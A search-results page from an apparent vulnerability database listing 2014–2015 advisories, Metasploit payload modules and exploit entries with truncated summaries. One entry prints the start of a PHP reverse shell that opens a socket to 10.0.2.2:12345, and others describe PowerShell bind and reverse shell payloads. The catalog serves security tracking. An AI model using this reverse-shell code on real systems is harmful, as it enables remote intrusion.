Lucene search
K

2166 matches found

Fedora
Fedora
added 2015/04/30 11:37 a.m.15 views

[SECURITY] Fedora 20 Update: mksh-50f-1.fc20

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

2.8AI score
Exploits0
Metasploit
Metasploit
added 2015/04/25 3:49 p.m.27 views

Windows Interactive Powershell Session, Bind TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' Extends the Exec payload to run a powershell command module MetasploitModule...

7AI score
Exploits0
Metasploit
Metasploit
added 2015/04/25 3:49 p.m.26 views

Windows Interactive Powershell Session, Reverse TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include...

7.4AI score
Exploits0
Metasploit
Metasploit
added 2015/04/24 9:25 a.m.40 views

Windows Interactive Powershell Session, Bind TCP

Interacts with a powershell session on an established socket connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include Msf::Payload::Sing...

7AI score
Exploits0
Fedora
Fedora
added 2015/04/21 7:25 p.m.34 views

[SECURITY] Fedora 22 Update: jython-2.7-0.7.rc2.fc22

Jython is an implementation of the high-level, dynamic, object-oriented language Python seamlessly integrated with the Java platform. The predecessor to Jython, JPython, is certified as 100% Pure Java. Jython is freely available for both commercial and non-commercial use and is distributed with...

2.6AI score
Exploits1
Cisco
Cisco
added 2015/04/14 9:23 p.m.35 views

Cisco Unified Communications Manager Interactive Voice Response Interface SQL Injection Vulnerability

A vulnerability in the Interactive Voice Response IVR interface of Cisco Unified Communications Manager UCM could allow an unauthenticated, remote attacker to conduct SQL injection attacks. The vulnerability is due to a lack of input validation on user-supplied input within SQL queries. An attack...

5CVSS7.5AI score0.01893EPSS
Exploits0References1
rdot
rdot
added 2015/04/08 12:0 a.m.819 views

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

1.7AI score
Exploits0
Check Point Advisories
Check Point Advisories
added 2015/03/26 12:0 a.m.2 views

Interactive Data eSignal Listener Buffer Overflow - Ver2 (CVE-2004-1868)

eSignal is a real-time market data and support tool provided by Interactive Data Corporation. The product supplies financial market data and more for traders over the internet. To facilitate the receipt of incoming data, eSignal opens a local, listening socket on TCP Port 80. There exists a buffe...

7.5CVSS6.5AI score0.06708EPSS
Exploits5
Fedora
Fedora
added 2015/03/19 6:39 p.m.48 views

[SECURITY] Fedora 21 Update: mapserver-6.2.2-1.fc21

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

6.8CVSS2.9AI score0.0222EPSS
Exploits1
Metasploit
Metasploit
added 2015/02/07 5:50 p.m.67 views

MySQL Login Utility

This module simply queries the MySQL instance for a specific user/pass default is root with blank. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

7.5CVSS7.3AI score0.51933EPSS
Exploits41
Kitploit
Kitploit
added 2015/01/26 6:59 p.m.20 views

CapTipper - Malicious HTTP traffic explorer tool

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations...

7.7AI score
Exploits0References1
CNVD
CNVD
added 2015/01/08 12:0 a.m.2 views

Hex-Rays IDA Pro Buffer Overflow Vulnerability

Hex-Rays IDA Pro is a set of static decompiler software from Hex-Rays Belgium. A buffer overflow vulnerability exists in Hex-Rays IDA Pro versions prior to 6.6 cumulative fix 2014-12-24, no detailed vulnerability details are provided at this time...

10CVSS7.2AI score0.01888EPSS
Exploits0References1
exploitpack
exploitpack
added 2015/01/05 11:28 a.m.39 views

Nagios-history.cgi-Exec-Code

CVE-2012-6096 - Nagios history.cgi Remote Command Execution Another year, another reincarnation of classic and trivial bugs to exploit. This time we attack Nagios.. or more specifically, one of its CGI scripts. !/usr/bin/python CVE-2012-6096 - Nagios history.cgi Remote Command Execution...

7.5CVSS0.5AI score0.6645EPSS
Exploits15
Packet Storm
Packet Storm
added 2014/12/19 12:0 a.m.42 views

TennisConnect 9.927 Cross Site Scripting

CVE-2014-8490 TennisConnect COMPONENTS System XSS Cross-Site Scripting Security Vulnerability Exploit Title: TennisConnect "TennisConnect COMPONENTS System" /index.cfm pid Parameter XSS Product: TennisConnect COMPONENTS System Vendor: TennisConnect Vulnerable Versions: 9.927 Tested Version: 9.927...

6.4AI score0.00797EPSS
Exploits2
Packet Storm
Packet Storm
added 2014/12/16 12:0 a.m.57 views

Arris Touchstone TG862G/CT Cross Site Request Forgery

----------- Vendor: ----------- Arris Interactive, LLC http://www.arrisi.com/ ISP: Comcast Xfinity ----------------------------------------- Affected Products/Versions: ----------------------------------------- HW: Arris Touchstone TG862G/CT Xfinity branded SW: Version 7.6.59S.CT Tested...

6.8CVSS0.6AI score0.0056EPSS
Exploits1
Packet Storm
Packet Storm
added 2014/12/16 12:0 a.m.39 views

Arris Touchstone TG862G/CT Cross Site Scripting

----------- Vendor: ----------- Arris Interactive, LLC http://www.arrisi.com/ ISP: Comcast Xfinity ----------------------------------------- Affected Products/Versions: ----------------------------------------- HW: Arris Touchstone TG862G/CT Xfinity branded SW: Version 7.6.59S.CT Tested...

3.5CVSS6.8AI score0.00767EPSS
Exploits1
Gentoo Linux
Gentoo Linux
added 2014/11/21 12:0 a.m.46 views

Adobe Flash Player: Multiple vulnerabilities

Background The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Description Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. Impact A remote attacke...

10CVSS7.8AI score0.90208EPSS
Exploits10
RedHat Linux
RedHat Linux
added 2014/11/17 6:11 p.m.82 views

Important: Red Hat Security Advisory: bash Shift_JIS security update

Updated bash ShiftJIS packages that fix one security issue are now available for Red Hat Enterprise Linux 5.9 Extended Update Support. Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed...

10CVSS7.2AI score0.99999EPSS
Exploits141References3
n0where
n0where
added 2014/10/13 7:20 p.m.49 views

Website Traffic Visualization: Logstalgia

Website Traffic Visualization Logstalgia is a website traffic visualization that replays or streams web-server access logs as a pong-like battle between the web server and an never ending torrent of requests. Requests appear as colored balls the same color as the host which travel across the scre...

Exploits0References1
Fedora
Fedora
added 2014/10/10 4:7 p.m.15 views

[SECURITY] Fedora 21 Update: mksh-50c-1.fc21

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

2.8AI score
Exploits0
Rows per page
Query Builder